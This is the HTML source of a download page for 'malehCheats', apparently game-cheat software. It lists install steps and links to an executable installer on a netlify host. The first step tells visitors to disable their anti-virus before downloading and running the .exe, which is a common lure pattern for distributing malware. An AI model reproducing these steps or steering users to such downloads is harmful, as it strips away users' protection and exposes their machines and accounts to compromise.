<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="UTF-8">
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <link rel="icon" type="image/x-icon" href="https://cheatershome.netlify.app/malehcheats/favicon.ico">
   <title>malehCheats</title>
   <style>
      body {
      background-color: #545454;
      text-align: center;
      }

      button {
        background-color: #000;
        border: .5px solid #2E3E50;
        border-radius: 10px;
        color: #fff;
        padding: 8px;
        font-size: 26px;
        font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        cursor: pointer;
        text-align: center;
      }
      .center {
      text-align: center;
      border: 3px solid green;
      }

      h1 {
         font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
         color: white;
      }
      h3 {
         font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
         color: white;
      }
      h4 {
         font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
         color: white;
      }
   </style>
</head>
<body>
   <div style="clear: left;">
      <img src="https://cheatershome.netlify.app/malehcheats/favicon.ico" height="64px" width="64px" border="0px">
      <h1>Welcome to malehCheats</h1>
      <h3>Steps to install:</h3>
      <h4>1. Disable your anti-virus</h4>
      <h4>2. Download the installer</h4>
      <h4>3. Run the installer</h4>
      <h4>4. After the installation start malehCheats.exe on your desktop</h4>
  </div>
  <a href="https://cheatershome.netlify.app/malehcheats/malehCheats Installer.exe"><button>Download</button></a>
</body>
</html>
